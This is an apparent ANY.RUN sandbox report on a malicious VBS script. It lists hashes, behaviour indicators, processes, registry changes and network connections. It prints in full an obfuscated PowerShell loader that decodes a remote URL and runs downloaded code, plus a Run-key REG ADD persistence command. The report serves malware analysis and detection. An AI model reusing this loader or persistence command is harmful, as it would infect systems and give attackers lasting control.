File name:

a0c98c5d094f3a962b2d06214fea99847dde9f9cf243ba595d9a111ef46e4cda.vbs

Full analysis: https://app.any.run/tasks/2b12b14d-bd8a-462b-8629-d8000772015b
Verdict: Malicious activity
Analysis date: January 24, 2024, 17:43:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

291189DBCC8FD160DEA92E43040F31BC

SHA1:

12E93151C18EAE201394ED3CBE3E4EB559851492

SHA256:

A0C98C5D094F3A962B2D06214FEA99847DDE9F9CF243BA595D9A111EF46E4CDA

SSDEEP:

384:uP//UdKF3pwiWK+VPfS5/CpBi2/c+9yl/xUTVYykWB3:WPpwit+tf4Ii2tgyT6WB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual connection from system programs

      • wscript.exe (PID: 1896)
  • SUSPICIOUS

    • Reads the Internet Settings

      • wscript.exe (PID: 1896)
      • powershell.exe (PID: 916)
      • powershell.exe (PID: 2148)
      • wab.exe (PID: 2172)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 1896)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 1896)
      • powershell.exe (PID: 916)
    • Reads settings of System Certificates

      • wab.exe (PID: 2172)
    • Checks Windows Trust Settings

      • wab.exe (PID: 2172)
    • Reads security settings of Internet Explorer

      • wab.exe (PID: 2172)
    • Starts CMD.EXE for commands execution

      • wab.exe (PID: 2172)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 1500)
  • INFO

    • Reads the machine GUID from the registry

      • wab.exe (PID: 2172)
    • Checks supported languages

      • wab.exe (PID: 2172)
    • Reads the computer name

      • wab.exe (PID: 2172)
    • Checks proxy server information

      • wab.exe (PID: 2172)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
6
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe powershell.exe no specs powershell.exe no specs wab.exe cmd.exe no specs reg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
916"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Theanth Pepto Busser Uddiffere Fuldt #>;Function Efterspndi ([String]$Skubbe){$Samorritat=8;$Kinesisk=Mnjema1864($Skubbe);For($Samo=7; $Samo -lt $Kinesisk; $Samo+=$Samorritat){$Mnjema186=$Mnjema186+$Skubbe.Substring($Samo, 1)};$Mnjema186;}function Legemerne ($neuro){. ($Mnjema18601) ($neuro);}function Mnjema1864 ([String]$Konv){$Hootchesj1=$Konv.Length-1;$Hootchesj1;}$Mnjema18602=Efterspndi 'SuveraeTDynastirSnyderta Karaokn BrdfrusinpensifsorospoeLeucorrrStundrhrTestpiliAfhudennAppendagValgkam ';$Formandss=Efterspndi 'OpstillhTillidstMandagetOutdodgpTawsings Blomme:Sermoni/ Recept/PredicaibrydninhRytterkoDelineam GemineeBysvalesSpecialc DinareoCheckrymKirkegafWhinneloStraaler HumiditTorpede.Smdenavc FunktiotamtammmMutuali/PlatyspaBehovsrbJereeds/ PathfiKInstrueoUnderjomErysimumHdersgaiConfron.RelictdaHypokoncSiddembaErkende ';$Mnjema18601=Efterspndi 'PalantiiIndustreKleptomxDisinte ';$Mnjema18600=Efterspndi 'Gastroe$ EncefagDisappolTunnelboGvendembBelastnaThrapphl Annale: NegeriHDaglejeoPurprisoFortrintMedbrincHovedsahSpegeple AftryksYirringjSigmaet8tvangsm Heizing=Botiexi UnsorroSSubsiditGcellefaModbyderRevoksetViolern-ReprimaBSpeedwaiEnalyrotNonrescs SlagstTsicambrrElfhoodaScintilnIndopersKovacsafIndianeeamaryllrAfvegne Soakeds-CapiturS opfordoSaccharu TortulrRensnincAttouchePrecliv Nidkres$MineralFHumrforoBiplaner Jordovmglamoura TrkrudnFiktivadIdylismsTrappess Decapi Bulder-BladselDGrafikte MalfeasPreposstsmutteriNubilounfunktioaSomnambtMeloidaiTilstedoUncompenKiwitrt Rescal$FibropuH mdelokoprocacco ForbnntPostkasc owletohTriticaeUhjlpelsCashoopjBerolig2Fartber ';Legemerne (Efterspndi ' Juanna$Chirpieg SubradlSimilisoThistedbfugningastiltonlScholae:GennemkHReaddicoChronocomorlykotAvisartcGoodenih Afvrgee BalkjosQuipnonjEpilimn2 Vrdils=Stjerne$Nonenvie UnderknBortfoevPresbyt:UnhappiaForudbepMudroompSuppevid Anlgsta SnekastDivisioahvidvin ') ;Legemerne (Efterspndi ' IatrotIBegattamHydrogepsystemkoAbjunctrEkstrautParamou-ForstadM LeisuroSkrmarbdRingorduAftvinglOblatkae Traneb OpladerBprotochi PelototFarvevasLedelseTKlovnenrHabitrea BrinkenMultiplsRadernaf RomaneeDisciplrSkattev ') ;$Hootchesj2=$Hootchesj2+'\gastroto.Kir' ;Legemerne (Efterspndi 'Nonexub$skrivefgCourtiel HyperfoAccomplbUdeerhvakonstanl Dggela:SkovsavHSpytkrloisflageoPreadjut GenoptcKrafteshLngerneeDetaljes kommunjNipsgen7Cheviot=Skydepr(TjavsedTepispade Indkrvsdistribt Hypost-SchizogP EmanataGeromortKarambohlektrer Illustr$StjrthaHMinimusoMultisioBogatyrtAbrazitcRegionsh SwelteeBayheadsStorstajPresola2Drivkra)Thoraco ') ;while (-not $Hootchesj7) {Legemerne (Efterspndi ' BundfrICocainefOsborne Nonsucc(Switche$SecretiH slagteoAwardfoo AtolritSkatteacArbejdshAtwixtmeLuminess FellmojDeclive8Dknings.mrtelvrJ MellemoApologebStilmblSInsureetBlaahataJordrentRoddingeAnkylog Indiffe-KonsuleeNordmanqstudies Manefar$MidnatsMCafetern NaperyjOverdraeHolmensmDegnensaForstte1 Selekt8Massage6museums0Afmilit2Bonnycl)Selvddt Pilotpr{ HellerSBrnepartPercursavestindrorganistRoentge- StjforSdemipeslTummerueElevedeeNgleperpfinansi unwitt1sparsen}SmedejeeEmbodiel nonaccsCowberreAflejre{KujonscSKriminotbaracabaFilesanrMaaletetDreamie-PurslanSMannerslTaarnureTelefoneRekursbpBrovagt Tallini1Vouchsa; JusterLTenoriteCowlhylgBlaffene Bifagsm UddeleeFinansorPentahynAfrodiseTransum Cabinet$UncrystM AtelosnTelefonjWhirlwieBotswanm ChelifaAfflade1Seaworn8Styrtbo6Kuldebl0Disjunk0asketre}Beskude ');Legemerne (Efterspndi 'Cuspide$MonauragHollieslLeverino uncompb StepbaaEndeliglBiologs: MassefH RepropofremfreoHaverintAnkelsocNongenuhAdelphie ParaensSchoolbjVenefic7Svikler=Pressur( ZamarrTGeobotae MicrogsDilettatKeglers-TekstfePCornettaderivertSilkelrhMrenesp Hypsome$VelvetbHInappreoBrancheoRockerftOminssqcMedvindhGodskrieMurkransLandvsejStinass2Cathete)Kronolo ') ;}Legemerne (Efterspndi 'Ruffene$Millifag AbersvlQuaichsoStaatrob Glaspua FeedsmlDampbag:TearlikBSaligpreSiluroioBygakserGvinkeldUnderbyrCapsianeMarstalsGudewifbManifesa Ansine Admittb= Outloo StamaktGAffaldsePerseret Opsaml-IniquitCHipsintoMorrionnFremholtFuglecoeNondiasn judicat vacill Socialm$HejsteuHHdersgaoMethoxyoKalciumtRessoucc LommeshFulkdroe elektrs OveridjSparean2Husvild ');Legemerne (Efterspndi 'Sovepil$AversiogPoditeulParapodoFolklorbIllegalaReductol rodfas: NonrepRHurtleseStabilihUnderskeVoldeliaForpligrWetbirdiLfteparn Unsumm Aglethe= Nuisan Investm[HuleboeSbeskyttyUndertasgistssuturedinoeExtempomOverfru.UnabaseCArbejdsoDoorfranOverflav KapunsePacoletrRoyalistSluthoo]Outstee:Slukker:HenfaldFUnlunatrSlowmouoSledgermOmlbsouBPostresaTaknemlsSupermae Queers6 Kontro4PhilosoSTabaccot PomacerWeakishiEnchequngumiarbgMamonci(Batteri$ TagginBUndvrereautocoroTorporsrDogmetdd RedirirDataspeeIgnaciusStasesbbmeticulacowpunc) Transi ');Legemerne (Efterspndi 'Enkleme$Ealdermg Krokusl LgeerkoneurocybFiragotaClimberlKildeka:PlasticM IridocnTuschefjStenogre BlasermReglossa Deodor1 corses8Roquela6Submers2 Schedi Apoteke=Spisefr deflate[SpisesiSAmblyacy AnlgsgsScoliidtEllfisheMentolsmGrossne.SlumresTCambogieHermitaxByfestet Preben. UndselEKaukasin dentincAgendasogaflendd SnagediUnsceninDeanthrgSiegelv]Hemangi:Relevat:FreezesAHartlytSAfretteCLydefriISpectacIPludsel. TehandG CommeneNondupltTarzanuS ProsectAfskiberteksturiAdsorbenForhaangButomac(Semiann$RanthumRIrenscaeDriverkhProlangeUnintenaSmringsrSulfapriHandelsnFemoror)Hexamer ');Legemerne (Efterspndi 'Arrecta$UnquakegSprydsol uknnedo ArivaibSoegeraamorcotelProhast:NathimlMUnlocalnOutingsjaccerseeSocialdmOplandsa Parasi1Smedesv8Datasik6Lignese3Tendypr=Billeda$ EpitriMRethavenKhaikiojAnarthreNeurotomHusmndeaSnogesk1Wikiuds8Centrer6 afskrk2Betonbl.Begivensausteniu BibliobInsalubsKldernetEftermirPhilipui ugelannElefstrg Daghje(Assiduo3Anantab3 Viskes5Militar4indvand8Florida8Rogersc, ovario2Ekspone4fresiae7Overinf1Optagni4Augusta) Afskum ');Legemerne $Mnjema1863;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1500"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rekind" /t REG_EXPAND_SZ /d "%Skysovs% -w 1 $Fanspanted=(Get-ItemProperty -Path 'HKCU:\Stools\').Fratrdel;%Skysovs% ($Fanspanted)"C:\Windows\SysWOW64\cmd.exewab.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1896"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\a0c98c5d094f3a962b2d06214fea99847dde9f9cf243ba595d9a111ef46e4cda.vbs"C:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2148"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Theanth Pepto Busser Uddiffere Fuldt #>;Function Efterspndi ([String]$Skubbe){$Samorritat=8;$Kinesisk=Mnjema1864($Skubbe);For($Samo=7; $Samo -lt $Kinesisk; $Samo+=$Samorritat){$Mnjema186=$Mnjema186+$Skubbe.Substring($Samo, 1)};$Mnjema186;}function Legemerne ($neuro){. ($Mnjema18601) ($neuro);}function Mnjema1864 ([String]$Konv){$Hootchesj1=$Konv.Length-1;$Hootchesj1;}$Mnjema18602=Efterspndi 'SuveraeTDynastirSnyderta Karaokn BrdfrusinpensifsorospoeLeucorrrStundrhrTestpiliAfhudennAppendagValgkam ';$Formandss=Efterspndi 'OpstillhTillidstMandagetOutdodgpTawsings Blomme:Sermoni/ Recept/PredicaibrydninhRytterkoDelineam GemineeBysvalesSpecialc DinareoCheckrymKirkegafWhinneloStraaler HumiditTorpede.Smdenavc FunktiotamtammmMutuali/PlatyspaBehovsrbJereeds/ PathfiKInstrueoUnderjomErysimumHdersgaiConfron.RelictdaHypokoncSiddembaErkende ';$Mnjema18601=Efterspndi 'PalantiiIndustreKleptomxDisinte ';$Mnjema18600=Efterspndi 'Gastroe$ EncefagDisappolTunnelboGvendembBelastnaThrapphl Annale: NegeriHDaglejeoPurprisoFortrintMedbrincHovedsahSpegeple AftryksYirringjSigmaet8tvangsm Heizing=Botiexi UnsorroSSubsiditGcellefaModbyderRevoksetViolern-ReprimaBSpeedwaiEnalyrotNonrescs SlagstTsicambrrElfhoodaScintilnIndopersKovacsafIndianeeamaryllrAfvegne Soakeds-CapiturS opfordoSaccharu TortulrRensnincAttouchePrecliv Nidkres$MineralFHumrforoBiplaner Jordovmglamoura TrkrudnFiktivadIdylismsTrappess Decapi Bulder-BladselDGrafikte MalfeasPreposstsmutteriNubilounfunktioaSomnambtMeloidaiTilstedoUncompenKiwitrt Rescal$FibropuH mdelokoprocacco ForbnntPostkasc owletohTriticaeUhjlpelsCashoopjBerolig2Fartber ';Legemerne (Efterspndi ' Juanna$Chirpieg SubradlSimilisoThistedbfugningastiltonlScholae:GennemkHReaddicoChronocomorlykotAvisartcGoodenih Afvrgee BalkjosQuipnonjEpilimn2 Vrdils=Stjerne$Nonenvie UnderknBortfoevPresbyt:UnhappiaForudbepMudroompSuppevid Anlgsta SnekastDivisioahvidvin ') ;Legemerne (Efterspndi ' IatrotIBegattamHydrogepsystemkoAbjunctrEkstrautParamou-ForstadM LeisuroSkrmarbdRingorduAftvinglOblatkae Traneb OpladerBprotochi PelototFarvevasLedelseTKlovnenrHabitrea BrinkenMultiplsRadernaf RomaneeDisciplrSkattev ') ;$Hootchesj2=$Hootchesj2+'\gastroto.Kir' ;Legemerne (Efterspndi 'Nonexub$skrivefgCourtiel HyperfoAccomplbUdeerhvakonstanl Dggela:SkovsavHSpytkrloisflageoPreadjut GenoptcKrafteshLngerneeDetaljes kommunjNipsgen7Cheviot=Skydepr(TjavsedTepispade Indkrvsdistribt Hypost-SchizogP EmanataGeromortKarambohlektrer Illustr$StjrthaHMinimusoMultisioBogatyrtAbrazitcRegionsh SwelteeBayheadsStorstajPresola2Drivkra)Thoraco ') ;while (-not $Hootchesj7) {Legemerne (Efterspndi ' BundfrICocainefOsborne Nonsucc(Switche$SecretiH slagteoAwardfoo AtolritSkatteacArbejdshAtwixtmeLuminess FellmojDeclive8Dknings.mrtelvrJ MellemoApologebStilmblSInsureetBlaahataJordrentRoddingeAnkylog Indiffe-KonsuleeNordmanqstudies Manefar$MidnatsMCafetern NaperyjOverdraeHolmensmDegnensaForstte1 Selekt8Massage6museums0Afmilit2Bonnycl)Selvddt Pilotpr{ HellerSBrnepartPercursavestindrorganistRoentge- StjforSdemipeslTummerueElevedeeNgleperpfinansi unwitt1sparsen}SmedejeeEmbodiel nonaccsCowberreAflejre{KujonscSKriminotbaracabaFilesanrMaaletetDreamie-PurslanSMannerslTaarnureTelefoneRekursbpBrovagt Tallini1Vouchsa; JusterLTenoriteCowlhylgBlaffene Bifagsm UddeleeFinansorPentahynAfrodiseTransum Cabinet$UncrystM AtelosnTelefonjWhirlwieBotswanm ChelifaAfflade1Seaworn8Styrtbo6Kuldebl0Disjunk0asketre}Beskude ');Legemerne (Efterspndi 'Cuspide$MonauragHollieslLeverino uncompb StepbaaEndeliglBiologs: MassefH RepropofremfreoHaverintAnkelsocNongenuhAdelphie ParaensSchoolbjVenefic7Svikler=Pressur( ZamarrTGeobotae MicrogsDilettatKeglers-TekstfePCornettaderivertSilkelrhMrenesp Hypsome$VelvetbHInappreoBrancheoRockerftOminssqcMedvindhGodskrieMurkransLandvsejStinass2Cathete)Kronolo ') ;}Legemerne (Efterspndi 'Ruffene$Millifag AbersvlQuaichsoStaatrob Glaspua FeedsmlDampbag:TearlikBSaligpreSiluroioBygakserGvinkeldUnderbyrCapsianeMarstalsGudewifbManifesa Ansine Admittb= Outloo StamaktGAffaldsePerseret Opsaml-IniquitCHipsintoMorrionnFremholtFuglecoeNondiasn judicat vacill Socialm$HejsteuHHdersgaoMethoxyoKalciumtRessoucc LommeshFulkdroe elektrs OveridjSparean2Husvild ');Legemerne (Efterspndi 'Sovepil$AversiogPoditeulParapodoFolklorbIllegalaReductol rodfas: NonrepRHurtleseStabilihUnderskeVoldeliaForpligrWetbirdiLfteparn Unsumm Aglethe= Nuisan Investm[HuleboeSbeskyttyUndertasgistssuturedinoeExtempomOverfru.UnabaseCArbejdsoDoorfranOverflav KapunsePacoletrRoyalistSluthoo]Outstee:Slukker:HenfaldFUnlunatrSlowmouoSledgermOmlbsouBPostresaTaknemlsSupermae Queers6 Kontro4PhilosoSTabaccot PomacerWeakishiEnchequngumiarbgMamonci(Batteri$ TagginBUndvrereautocoroTorporsrDogmetdd RedirirDataspeeIgnaciusStasesbbmeticulacowpunc) Transi ');Legemerne (Efterspndi 'Enkleme$Ealdermg Krokusl LgeerkoneurocybFiragotaClimberlKildeka:PlasticM IridocnTuschefjStenogre BlasermReglossa Deodor1 corses8Roquela6Submers2 Schedi Apoteke=Spisefr deflate[SpisesiSAmblyacy AnlgsgsScoliidtEllfisheMentolsmGrossne.SlumresTCambogieHermitaxByfestet Preben. UndselEKaukasin dentincAgendasogaflendd SnagediUnsceninDeanthrgSiegelv]Hemangi:Relevat:FreezesAHartlytSAfretteCLydefriISpectacIPludsel. TehandG CommeneNondupltTarzanuS ProsectAfskiberteksturiAdsorbenForhaangButomac(Semiann$RanthumRIrenscaeDriverkhProlangeUnintenaSmringsrSulfapriHandelsnFemoror)Hexamer ');Legemerne (Efterspndi 'Arrecta$UnquakegSprydsol uknnedo ArivaibSoegeraamorcotelProhast:NathimlMUnlocalnOutingsjaccerseeSocialdmOplandsa Parasi1Smedesv8Datasik6Lignese3Tendypr=Billeda$ EpitriMRethavenKhaikiojAnarthreNeurotomHusmndeaSnogesk1Wikiuds8Centrer6 afskrk2Betonbl.Begivensausteniu BibliobInsalubsKldernetEftermirPhilipui ugelannElefstrg Daghje(Assiduo3Anantab3 Viskes5Militar4indvand8Florida8Rogersc, ovario2Ekspone4fresiae7Overinf1Optagni4Augusta) Afskum ');Legemerne $Mnjema1863;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2172"C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
3221225477
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
2316REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rekind" /t REG_EXPAND_SZ /d "%Skysovs% -w 1 $Fanspanted=(Get-ItemProperty -Path 'HKCU:\Stools\').Fratrdel;%Skysovs% ($Fanspanted)"C:\Windows\SysWOW64\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
Total events
5 188
Read events
5 106
Write events
82
Delete events
0

Modification events

(PID) Process:(1896) wscript.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\15A\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(1896) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1896) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1896) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1896) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(916) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(916) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(916) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(916) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(916) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\15A\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
Executable files
0
Suspicious files
10
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
1896wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506compressed
MD5:AC05D27423A85ADC1622C714F2CB6184
SHA256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
1896wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:32C2CA4D59F44092CCB01ED63D1E7DEC
SHA256:DBC05929182A2282001AEF3647377ACE67314E8A711883ED1707AD5F054B9175
1896wscript.exeC:\Users\admin\AppData\Local\Temp\Cab49C.tmpcompressed
MD5:AC05D27423A85ADC1622C714F2CB6184
SHA256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
1896wscript.exeC:\Users\admin\AppData\Local\Temp\Tar49D.tmpbinary
MD5:9C0C641C06238516F27941AA1166D427
SHA256:4276AF3669A141A59388BC56A87F6614D9A9BDDDF560636C264219A7EB11256F
916powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:1BB55BFB13A8D65B61D2B980DCF5DC32
SHA256:EE972334C23CFF7D47D2D488B430DDC752E24874A77C3F3B314F76C911BC3C2D
2148powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8637E3C48E1AAF3566CD5C561474E39F
SHA256:BDBF3AF4795B1EEEA955FEAD12EE7F1FABBDDC4410816B668F71C73CE0F2CF3C
916powershell.exeC:\Users\admin\AppData\Local\Temp\nwzpv4uq.smx.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2148powershell.exeC:\Users\admin\AppData\Local\Temp\yfjxwoxi.zw3.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2148powershell.exeC:\Users\admin\AppData\Local\Temp\d35ofcdx.t2z.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
916powershell.exeC:\Users\admin\AppData\Local\Temp\pwoevpxi.ewz.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
11
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1896
wscript.exe
GET
200
23.48.23.7:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11e138be541e0fe0
DE
compressed
65.2 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
224.0.0.252:5355
unknown
4
System
192.168.100.255:137
whitelisted
1896
wscript.exe
23.48.23.7:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
unknown
1220
svchost.exe
239.255.255.250:3702
whitelisted
352
svchost.exe
224.0.0.252:5355
unknown
1220
svchost.exe
239.255.255.250:1900
whitelisted
864
svchost.exe
162.0.235.86:443
ihomescomfort.com
NAMECHEAP-NET
US
unknown
2172
wab.exe
142.250.184.238:443
drive.google.com
GOOGLE
US
whitelisted
2172
wab.exe
142.250.186.161:443
drive.usercontent.google.com
GOOGLE
US
whitelisted

DNS requests

Domain
IP
Reputation
ctldl.windowsupdate.com
  • 23.48.23.7
  • 23.48.23.21
whitelisted
ihomescomfort.com
  • 162.0.235.86
unknown
drive.google.com
  • 142.250.184.238
shared
drive.usercontent.google.com
  • 142.250.186.161
unknown

Threats

No threats detected
No debug info